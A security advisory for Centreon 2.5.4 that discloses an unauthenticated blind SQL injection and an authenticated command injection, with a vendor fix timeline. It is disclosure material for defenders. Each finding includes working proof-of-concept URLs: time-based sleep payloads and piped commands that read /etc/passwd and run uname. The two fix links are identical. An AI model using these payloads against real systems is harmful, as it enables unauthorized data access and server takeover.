Centreon 2.5.4 - Multiple Vulnerabilities

Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
 
CVEs: CVE-2015-1560, CVE-2015-1561
 
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
 
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
 
Advisory introduction:
Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
 
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
 
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request.
 
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
 
By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561.
 
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
$command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters.
 
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting command into "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t
oday&session_id=[valid session_id]
- Injecting "uname ?a" into "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%
23&session_id=[valid session_id]
 
Combining two vulnerabilities, an unauthenticated attacker can take control of the web server.
 
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi 
13/02/2015 - Vendor fixed RCE
 
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582

#  0day.today [2018-01-10]  #